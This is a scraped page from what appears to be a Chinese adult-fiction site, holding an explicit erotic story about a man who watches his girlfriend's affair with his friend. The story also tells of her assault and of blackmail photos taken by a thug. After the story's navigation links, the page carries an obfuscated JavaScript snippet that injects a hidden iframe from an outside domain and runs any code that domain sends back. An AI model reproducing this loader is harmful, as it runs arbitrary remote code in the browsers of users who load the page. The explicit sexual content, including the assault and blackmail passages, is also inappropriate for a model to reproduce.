字幕網- 每日更新 永久免費

女友紀實

  (一)相片

  「……我忘記帶鑰匙了,那我先住在大龜家好了,等你回來我再去找你……自己小心了……嗯……拜!」我失望地跟女友告別,掛掉電話。

  凡事就是有那幺巧合,本來向公司請了幾天假,打算偷偷上來台北,讓女友有一個驚喜,誰知到了火車站打給女友時,她反倒到了台中參加研討會。這下好了,人生地不熟的,又忘記帶上女友住處的鑰匙,還好大龜可以提供我一個臨時休息的地方。

  叫了計程車到大龜的住處,從電話中大龜告訴我的,在門口鞋櫃中拿出備用鑰匙。

  「今天你自己隨便吃一吃,趁著可怡不在你身邊,晚上我再介紹幾個妹讓你認識。就這樣,我先上班了……」大龜在電話中說著。

  「你忙吧,我自己來就行了。」我邊啃著冷掉了的三明治,邊和大龜通著電話。

  可怡,也就是我的女友,外表雖不是特別豔麗,但甜甜的笑容卻是最吸引我的地方,大學畢業後,就考上北部的學校當上老師,而我必須回南部工作,也因此展開了我們的遠距離戀愛。

  陳規鳴,綽號大龜,我和可怡的大學同學,也是我的死黨之一,為人還算風趣幽默,不過因為太花心了,可怡和他倒是不太對盤,每次兩人講不到幾句話就吵了起來,害我被夾在中間當雙方的出氣桶。

  女友及好友都必須上班,我隻好從電視櫃的抽屜中拿出幾片DVD來打發時間也算過得去。當我要把花了一下午時間看完的《蜘蛛人3》及《驚奇四超人》

  收進抽屜時,抽屜卻卡住合不上,嘿嘿,任誰都知道這抽屜底層有玄機,等我拿出仔細一看,原來是一本相簿,我迫不及待地打開來。

  隻見一個綁馬尾的嬌小女生,麵向著牆壁,看樣子是大龜新交的女友,還在嬌羞著,想必這就是自拍吧!大龜真有辦法,能讓交往過的每個女友都對他服服貼貼的,不像可怡,當初說要拍她時,還大罵我變態。

  不知女生相貌如何?翻開下一頁,隻見女生的橫條紋上衣隻扣上一顆鈕扣,素色的白色內衣稍微可見,白嫩的肌膚下雖不見女生全貌,但笑容下有著一道淺淺的乳溝,那平坦的小腹和小小的肚臍互相影襯著,我想應該是一位可愛的女生吧!

  看著這個女生小小的性感裸露,更平添了無限想像的空間,不知她的麵貌如何?不知在床上的表現是否會像隻小野貓?不知包覆在內衣下的兩顆小豐桃是否鮮嫩欲滴?

  可惜的是雖然相簿一大本,但相片就這幾張,任憑我再怎幺東翻西找,除了找到幾件女性的衣物及衛生用品外,就沒別的裸露照了。大龜的臥房則是鎖著進不去,我隻好再回客廳對這些照片回味再三。

  到了晚上和大龜及他的多位辣妹同事用餐時,我再三的尋找,仍都找不出符合照片上的女生,看樣子那照片上的女生大概又是大龜的一段感情過客罷了。

  (二)被原諒的背叛

  這天因為火車誤點的關係,大龜和我來到火車站接可怡時已經是晚上11點了。或許是太久沒見麵的關係吧,可怡一見到我時還顯現出剛戀愛時的嬌羞,嘟著小小的嘴巴,連頭都不太敢抬,若不是大龜在場,我肯定會把可怡抱入懷中。

  「唉呦!可怡姐好久不見了,人也越來越漂亮了,我跟阿宗說說看,阿宗做你的大老公,我當你的小情郎,如何呢?」大龜果然一見麵就沒好話,當我的麵吃起可怡的豆腐了。

  本想說可怡一定會給大龜臉色看,想不到可怡聽到這些話,頭更低、臉更紅了。

  看到可怡害羞的樣子,我終究是忍不住低下頭快速往可怡的臉瞅了一下,然後急忙打圓場說:「大龜你就不要再開可怡玩笑了,難得可怡退一步,不再像以前一樣和你吵架,你也就讓讓可怡吧!」

  「是!是!是……可怡姐大人有大量,原諒小的又說錯話了,小的給你賠不是,大小姐請讓小的為你服務,請進。」大龜難得聽我的建議,邊開著車門邊對可怡打躬作揖的說。

  可怡看到大龜搞笑的語氣和模樣,終於「噗嗤」一聲的笑了出來,這才挽著我的手坐進車裏。

  一路上大龜很快的故態複萌,盡是開著可怡的玩笑,一下說:等等換他坐後座,他也想讓可怡摟著他的臂膀;一下說:他開車很累,要可怡幫他全身按摩。

  可怡聽到這些話,倒也不像以前求學時那幺生氣了,隻是一直嘟著嘴巴,臉紅紅的說不出話來,而我也樂得輕鬆。大龜說的話就那個調調,我本來就不在意的,女友也不知為什幺,這次不再和大龜作對頭,這下我更不用在好朋友和女友之間當夾心酥。

  等到可怡租屋處時,或許是研習一整天加上空等火車所帶來的疲憊,等我和大龜道別後再上樓時,可怡已經整個人窩在床上睡著了,而此刻的我隻能坐在床沿看著睡的香甜的女友,看那細細的彎眉、微翹的紅唇、聽那伴隨著胸脯一上一下的呼吸聲,更愛看女友側躺時,那雪白雙峰所夾成的乳溝,我想這也是另一種獨醒的幸福吧!

  看著女友熟睡中的我,發現女友剛帶回來的行李還放在一旁,『我來幫她收一收吧!』我心想著,並開始把裏麵的衣物拿出來整理。

  「哇!」正當拿出衣服時,粗心的我不小心讓可怡放在袋子裏的手機掉在地上了,我忍不住發出一聲輕呼。還好沒把手機摔壞,正把手機撿起來時,剛巧手機掉到地上時不小心碰撞到訊息鍵,手機銀幕上出現了可怡的訊息送件箱,而可怡寄出的訊息,居然大部份都是寄給大龜。

  他們不是一直不合嗎?為什幺可怡會寄那幺多的訊息給大龜呢?在好奇心的驅使下,我還是偷偷打開了可怡寄給大龜的訊息。

  「小公公,我到台中了,你要聽話,不準亂跑喔!」光看完第一則,就已經讓我傻眼了,女友居然用撒嬌的語句稱呼大龜為小公公。

  「小乖乖很想你欸!可是你也知道這天不能陪你了,以後一定會好好補償你的。」看傳送日期,都是可怡到台中這天傳送給大龜的,接下來的幾則,我早已無心思再看下去,心裏隻有一個想法,我一定要把事情查明白。

  隔天,我馬上編了一個藉口說必須馬上回高雄,到了火車站,確定可怡離開了,我馬上租了一台摩托車,先是漫無目的的到處繞繞,到了傍晚4點多才回轉到可怡住處對麵的小公園等待,打算來個守株待兔。

  到了晚上才見到大龜的車開到巷子口停了下來,可怡果然也在大龜的車上。

  『可怡應該是下班時恰巧遇到大龜的吧,朋友之間吃一下飯、搭一下便車也不是什幺大不了的事。』我的心裏還是這樣的說服自己。

  隻見大龜和可怡兩人從巷子口慢步地往可怡的租屋處走來,為了不被發現,我隻好躲在公園的一塊小土坵後。

  過沒多久,正想探頭出來看看他們是否已經分別時,卻見大龜和可怡早已在門口緊緊地擁吻在一起,直到有其他住戶開門出來時,可怡才把大龜推開依依不舍的進門去。

  看到這一幕的我,心髒像是被一把刀刺中的疼痛著,心裏也開始懷疑著昨晚可怡臉紅的原因是因為見到我,還是因為見到大龜?正想衝出去攔住大龜,問清楚怎幺回事時,往前跨的腳步突然被一聲髒話拉回。

  「幹XX,就是那個男的破壞了我的好事,不過,那女的身材真好,尤其是那對香乳,才捏了幾下,口中說不要,奶頭還不是硬起來!我手一摸到那騷穴,整個已經濕到不行,本想先拍照以後可用來威脅,到時又多一個床上玩物,可惜才拍了兩張照,連上都還沒上,她男友就來了,還好我跑得快,以後一定要再找機會報複他們才甘心。」

  原來說話的人躲在小土坵前的石桌旁中,我忍不住偷瞄了一眼,發現人像是個混混,已經喝了不少酒,更奇怪的是雙眼正直盯著大龜看。

  「算了,人家沒報警抓你已經算你運氣好了。」隻見另一名小混混的人淫笑輕佻的邊看著手機邊說著。

  『他們和大龜、可怡有什幺過節嗎?拍什幺照?手機裏有什幺呢?』我心裏納悶著。

  見大龜離開,那兩個混混也起身去上廁所,看他們步履躝跚的樣子,應該都醉了七、八分吧,好奇心的驅使下,我偷偷的跑去看他們放在石桌上的手機,果然還是在相片模式中。

  這……沒錯,照片上確實是女友,隻是女友的臉上卻是充滿驚恐的表情;另一張看得出來女友的衣服已被這些小混混脫掉,女友隻好用棉被包著,卻也微露出細致的雙肩。

  『那些混蛋竟是如此的可惡,王八到家了!』我心裏惡狠狠地咒罵著,我邊把照片刪掉,卻也終於驚覺到可怡幾個月前打電話給我時,總是哭哭啼啼的說她被一個混混騷擾,當時的我為了一筆生意,壓力頗大,加上以為可怡口中的騷擾隻是被口語調戲,所以沒有多加理會,想不到可怡竟是受到了這幺大的委屈。

  從那些混混之前的對話及眼神看來,我想當時應該是大龜適時救了可怡。是啊!驚醒的我突然隻覺得一切都怪我的不貼心,我不能及時保護可怡,就連最基本的關心都做不到,我想我才是把可怡推往大龜的推手,我怎能怪罪到可怡和大龜的背叛呢!

  就這幺的心念移轉,也讓我對於可怡和大龜的背叛有那幺一點點的釋懷。

  (三)春宮秀

  接下來的我向公司請了一個月的長假,不過我並不是去找大龜和可怡攤牌,而是聽到那兩名混混說要報複大龜和女友而擔心著,可是我又不能直接了當的對大龜和女友說,所以隻能先留在這裏暗地裏保護女友的安全。

  這天早上,隻見女友出現在租屋樓下,在暖暖的陽光下,一頭微濕卷亮發型的女友顯得那樣的年輕俏麗,當時的我,有多幺的衝動想跑出去抱住女友,可惜的是我知道女友等的不是我。

  果然沒多久就見到大龜出現在巷子口,女友一見到大龜,就迫不急待的就向前走去牽著大龜的手,似乎在訴說著她昨晚有多幺想念大龜。看著他們倆有說有笑地離去,我心裏同時出現一點點的惆悵和欣慰,惆悵的是不知女友心中是否還有我這位正牌男友的地位;欣慰的是女友孤單時有人可以依靠,讓我真的替女友感到高興。

  女友被大龜載去上班後,閑著無事的我也隻能漫無目的到處逛了一個上午。

  不知不覺中已經從女友的住處逛到大龜家,正當想離開時,突然聽到大龜家的客廳似乎發出一些聲響。

  『大龜明明在上班,為什幺會有聲音呢?不會是兩個混混已經偷潛入大龜家中,要等大龜回來對他不利吧?』我心裏恐懼的想著,為了保護可怡和大龜,我壯大膽子從大龜的鞋櫃中拿出預備鑰匙,小心翼翼的開了門。

  「呼~~」我忍不住鬆了一口氣,原來是廚房的後門忘記關,有一隻貓趁隙跑進來搗亂,花了我好久的時間,才讓貓從二樓房間的陽台跳出去。等我回過神來,才發現貓跳出去的房間就是上次大龜鎖起來的臥房。

  當我大略瞄了一眼,正如當初我想像的一樣,房間中到處都擺放著女性的衣物及飾品,我想不用猜也知道是我女友可怡的;床頭還放著一本相簿,照片中都是大龜和可怡出去玩的恩愛情景,我想大龜是怕被我發現,所以當我來找他時,他應該有事先回來把房門鎖上吧!

  正當我還沉溺於自己的思緒中時,突然從樓下傳來幾句對話聲,『不會那幺巧吧?大龜在這時候回來。』我心想。

  我快速走到陽台外,藉由房裏的窗簾遮住了我的身影,透過細縫注意房裏,隻希望大龜不會進房,免得我被發現。

  然而天總是不從人願,而且聽聲音還是兩人朝房間走過來。

  「你不知道人家在學校很忙啊,還叫人家請假回來陪你吃飯。」沒錯,說話的正是我的女友,可怡。

  「沒辦法嘛,陳組長說太久沒看見你這位大美女,就纏著我一定要找你出來一同吃頓飯。」大龜說著。

  「陳組長會想我,就隻有你不想我。」可怡嘟著嘴反駁。

  「當然想啊!我女友那幺可愛,讓我早也想、晚也想,尤其是我女友身上的奶香味,讓我最著迷了。」大龜邊說著,雙手也不安份地解開可怡身上針織衫的鈕扣,不一會兒可怡就露出了裏麵的白色蕾絲內衣。

  「不要鬧了啦!人家還要換衣服,不然吃飯會來……嗯……不及……」可怡還沒說完話,大龜就吻上了可怡的唇。可怡其實是很容易動情的人,果然沒過多久,可怡已雙眼迷蒙,翹著腳尖回應著大龜的深吻。

  大龜的吻慢慢地從可怡的唇下滑到可怡細嫩的脖子,可怡身上穿的粉色針織衫也被大龜脫掉丟在地上,露出白嫩滑溜的上半身,隻靠著那白色內衣覆蓋在那對嬌乳上。

  大龜一手纏住可怡的腰身,一手熟練地把那上身的唯一遮掩物,也就是可怡的內衣解下,可怡的乳房瞬間繃跳了出來。大龜一下找到了那已經堅挺的乳頭,伸出舌頭開始吸舔著,「唔……公公……好……好……舒服……」隨著大龜吸得越大力,可怡的呻吟也越大聲。

  大龜吸著可怡的嬌乳,雙手也慢慢地褪下了可怡的裙子與內褲,可怡露出那如玉筍般的雙腿,大腿根處卻是與潔白雙腿反襯的一片黑森林,而那黑森林上已沾附著珠珠的水滴,原來可怡的淫水早已潺潺流出了。

  「唔……啊……啊……啊……公……公,再……進去一點……」可怡用幾乎是氣音的聲音說著,原來大龜的雙指已抽插著可怡的小穴:「噗滋、噗滋……」大龜一聽這話,更是加強了手抽插的力道及速度,看樣子是可怡的小穴流出了不少的淫水,才能發出那樣的聲音。

  大龜看可怡已完全沉浸在性愛中,趁空迅速把自己身上的衣物解下,露出昂首朝天的陽具,那條巨蟲果然型如人名,讓我在心中暗自比較都自歎弗如。大龜順勢讓可怡趴在床緣,翹起臀來露出已淫水潺潺的陰戶,一下就把那條青筋暴露的巨蛇插進女友的小穴中。

  「啊……啊……啊……好爽……公……公……好爽……唔……」女友終於毫無保留地大聲呻吟,臀部也隨著抽插節奏一前一後地迎合大龜的巨大陽物而發出「啪啪啪」的聲響。

  親眼看見女友和別人做愛的我,卻一點也不想去阻止他們,因為我這是我第一次見到可怡跟別人做愛時的淫蕩神態,淫靡的表情、勾人懾魂的呻吟聲、隨著性愛節奏扭動的身軀,讓我隻能一動也不動的靜靜觀看著,深怕一出聲就破壞了這畫麵。

  魚水交歡的纏綿終於在四十幾分鍾後結束,大龜也在可怡的粉嫩細致的小穴外射出了白濁的精子。兩人躺了一下才起身穿好服裝,出門參加同事的飯局。

  「咳咳!你也該出來了吧?」

  正當我還沉浸在剛剛的性愛饗宴中時,房間中突然出現的人聲硬是把我從幻想中拉回現實世界。我往房間內一看,哇咧!差點嚇到心髒跳了出來,那不是在公園看到的兩個混混之一的年輕混混正硬挺挺的站在床頭嗎?

  「小哥,想不到你也跟蹤到這裏來了,之前在小公園那邊我也注意到你躲在另一邊偷看,想不到你能找到這裏,真是相當有心。」年輕混混對著我說。

  「嗬嗬,那個妞我一眼看到就馬上被她迷住了,所以……嘿嘿!」我順著年輕混混的語意說著。看樣子,我是被誤會成跟蹤及偷窺的好色之徒了。

  「小哥你的眼光不錯,一眼就看上了我大哥的獵物。」年輕混混說。

  「沒啦!不敢,不敢,我今天隻是一時意亂情迷,看到後門沒關就闖了進來的,大哥看上的女人我不敢搶啦!」我編著謊言說著。

  「想不到你能從我偷開的門進來,也算是大家有緣,才能一同看到這場春宮秀。」年輕混混邊說邊模仿可怡被幹的表情。

  「嗬嗬,你模仿得倒是蠻惡心的!」看到年輕混混的搞笑神情,我緊張心情頓時輕鬆不少,也開起他的玩笑。

  「說得也是,還是又白又嫩的可怡老師才能讓人想入非非。」年輕混混說。

  「咦,你知道這個她的名字啊?」我驚訝地問著。

  「是啊!她是我的國中老師,之前我和大哥偷窺的那天晚上,看到可怡老師我就有點眼熟了,隻是那天喝太醉了,所以沒能記起來。後來,我又偷偷跟蹤過幾次可怡老師,才知道她大部份時間都住在她男朋友這裏。今天也是和你一樣逛到這裏,想到可怡老師的香嫩胴體,忍不住色性便偷偷跑了進來,想不到意外看到一場精彩的春宮秀。」年輕混混說。

  「好了,我們出去再說吧,在這裏待太久不好。」我壓抑著驚訝說著。

  原來小混混綽號叫做蚊子,剛從國中畢業兩年而已,可怡就在他九年級時教過他。蚊子畢業之後就在討債集團當打手,也剛巧就在小公園偷窺的那天晚上,他們在路上遇到了以前的仇家,兩方爆發衝突,蚊子的大哥(用手機拍攝可怡的中年混混)被打成植物人,蚊子則僥幸僅受皮肉傷,所以有點覺悟,又想起可怡以前在學校對他的教誨,才讓蚊子脫離黑道,打算到機車店當學徒。

  得知中年混混受傷變植物人的消息之後,可怡人身安全的顧慮也消失了,我沒待多久便銷假回公司上班了。至於大龜和可怡呢?我是抱持著隨緣的態度,畢竟就某部份來說我算是自作自受,『一切等可怡轉調到南部教書,他們兩個應該會自然而然就結束吧!』我心想(苦笑)。

  (待續)

  全文66072字節
[ 此帖被逍遙大聖在2013-03-16 22:46重新編輯 ]

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:【亂欲】作者:霍爾
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};